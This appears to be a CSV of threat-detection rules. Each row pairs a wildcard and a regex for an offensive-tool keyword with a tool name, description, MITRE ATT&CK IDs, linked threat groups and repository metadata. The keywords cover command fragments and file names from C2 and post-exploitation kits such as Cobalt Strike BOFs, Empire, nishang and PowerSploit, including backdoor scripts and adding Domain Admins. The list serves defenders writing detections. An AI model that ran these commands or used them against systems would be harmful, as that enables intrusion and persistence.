"*Add-Printer -Name $PrinterName -DriverName ""Generic / Text Only"" * -PortName*",".{0,1000}Add\-Printer\s\-Name\s\$PrinterName\s\-DriverName\s\""Generic\s\/\sText\sOnly\""\s.{0,1000}\s\-PortName.{0,1000}","offensive_tool_keyword","IPPrintC2","PoC for using MS Windows printers for persistence / command and control via Internet Printing","T1090 - T1133 - T1547.012 - T1572","TA0011 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/Diverto/IPPrintC2","1","0","N/A","lolc2","10","10","146","20","2024-05-03T11:13:38Z","2024-05-03T09:13:10Z","33356"
"*Add-PrinterPort $C2output*",".{0,1000}Add\-PrinterPort\s\$C2output.{0,1000}","offensive_tool_keyword","IPPrintC2","PoC for using MS Windows printers for persistence / command and control via Internet Printing","T1090 - T1133 - T1547.012 - T1572","TA0011 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/Diverto/IPPrintC2","1","0","N/A","lolc2","10","10","146","20","2024-05-03T11:13:38Z","2024-05-03T09:13:10Z","33357"
"*addpriv SeloadDrivePrivilege*",".{0,1000}addpriv\sSeloadDrivePrivilege.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","33358"
"*Add-PSFirewallRules*",".{0,1000}Add\-PSFirewallRules.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","PowerBreach.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","33359"
"*Add-PSFirewallRules*",".{0,1000}Add\-PSFirewallRules.{0,1000}","offensive_tool_keyword","PowerBreach","PowerBreach is a backdoor toolkit that aims to provide the user a wide variety of methods to backdoor a system","T1055 - T1203 - T1105 - T1202 - T1027 - T1059 - T1070","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/PowerShellEmpire/PowerTools","1","0","N/A","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","33360"
"*ADDR ?= 127.0.0.1:4444*",".{0,1000}ADDR\s\?\=\s127\.0\.0\.1\:4444.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","33365"
"*Add-RegBackdoor.ps1*",".{0,1000}Add\-RegBackdoor\.ps1.{0,1000}","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","N/A","10","10","1493","252","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z","33366"
"*Add-RegBackdoor.ps1*",".{0,1000}Add\-RegBackdoor\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","33367"
"*Add-RemoteRegBackdoor*",".{0,1000}Add\-RemoteRegBackdoor.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Using DAMP toolkit We add the backdoor using the Add-RemoteRegBackdoor.ps1 cmdlet from DAMP.","T1558.001 - T1078.002 - T1550.003","TA0008 - TA0009 - TA0003","N/A","Black Basta","Persistence","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","33368"
"*Add-RemoteRegBackdoor*",".{0,1000}Add\-RemoteRegBackdoor.{0,1000}","offensive_tool_keyword","DAMP","The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification.","T1222 - T1222.002 - T1548 - T1548.002","TA0005 ","N/A","N/A","Persistence","https://github.com/HarmJ0y/DAMP","1","1","N/A","N/A","10","4","378","79","2019-07-25T21:18:37Z","2018-04-06T22:13:58Z","33369"
"*Add-RemoteRegBackdoor.json*",".{0,1000}Add\-RemoteRegBackdoor\.json.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","33370"
"*addresshunter.h*",".{0,1000}addresshunter\.h.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","33371"
"*Add-ScrnSaveBackdoor.ps1*",".{0,1000}Add\-ScrnSaveBackdoor\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","33372"
"*Add-ServiceDacl *",".{0,1000}Add\-ServiceDacl\s.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","33373"
"*Add-ServiceDacl*",".{0,1000}Add\-ServiceDacl.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","N/A","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","33374"
"*addspn.py -u * -p * -t * -s * --additional *",".{0,1000}addspn\.py\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-t\s.{0,1000}\s\-s\s.{0,1000}\s\-\-additional\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","33375"
"*addspn.py*",".{0,1000}addspn\.py.{0,1000}","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation tool","https://github.com/dirkjanm/krbrelayx","1","1","N/A","N/A","N/A","10","1281","181","2025-01-27T09:22:54Z","2019-01-08T18:42:07Z","33376"
"*AddUser-Bof.c*",".{0,1000}AddUser\-Bof\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that Add an admin user","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/0x3rhy/AddUser-Bof","1","1","N/A","N/A","10","10","71","14","2022-10-11T06:51:27Z","2021-08-30T10:09:20Z","33377"
"*AddUser-Bof.git*",".{0,1000}AddUser\-Bof\.git.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that Add an admin user","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/0x3rhy/AddUser-Bof","1","1","N/A","N/A","10","10","71","14","2022-10-11T06:51:27Z","2021-08-30T10:09:20Z","33378"
"*AddUser-Bof.o*",".{0,1000}AddUser\-Bof\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that Add an admin user","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/0x3rhy/AddUser-Bof","1","1","N/A","N/A","10","10","71","14","2022-10-11T06:51:27Z","2021-08-30T10:09:20Z","33379"
"*AddUser-Bof.x64*",".{0,1000}AddUser\-Bof\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that Add an admin user","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/0x3rhy/AddUser-Bof","1","1","N/A","N/A","10","10","71","14","2022-10-11T06:51:27Z","2021-08-30T10:09:20Z","33380"
"*AddUser-Bof.x86*",".{0,1000}AddUser\-Bof\.x86.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that Add an admin user","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/0x3rhy/AddUser-Bof","1","1","N/A","N/A","10","10","71","14","2022-10-11T06:51:27Z","2021-08-30T10:09:20Z","33381"
"*AddUserImplant*",".{0,1000}AddUserImplant.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","0","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","33382"
"*AddUserToDomainGroup *Domain Admins*",".{0,1000}AddUserToDomainGroup\s.{0,1000}Domain\sAdmins.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of beacon BOF written to learn windows and cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Yaxser/CobaltStrike-BOF","1","0","N/A","N/A","10","10","347","57","2023-02-24T13:12:14Z","2020-10-08T01:12:41Z","33383"
"*AddUserToDomainGroup.*",".{0,1000}AddUserToDomainGroup\..{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of beacon BOF written to learn windows and cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Yaxser/CobaltStrike-BOF","1","1","N/A","N/A","10","10","347","57","2023-02-24T13:12:14Z","2020-10-08T01:12:41Z","33384"
"*AddUserToDomainGroup.cna*",".{0,1000}AddUserToDomainGroup\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of beacon BOF written to learn windows and cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Yaxser/CobaltStrike-BOF","1","1","N/A","N/A","10","10","347","57","2023-02-24T13:12:14Z","2020-10-08T01:12:41Z","33385"
"*adeb6e60c4b8f102216d935dfa9dfe6cf53988fe41f9418fdb5674b5adadbf65*",".{0,1000}adeb6e60c4b8f102216d935dfa9dfe6cf53988fe41f9418fdb5674b5adadbf65.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","33389"
"*adeb6e60c4b8f102216d935dfa9dfe6cf53988fe41f9418fdb5674b5adadbf65*",".{0,1000}adeb6e60c4b8f102216d935dfa9dfe6cf53988fe41f9418fdb5674b5adadbf65.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","33390"
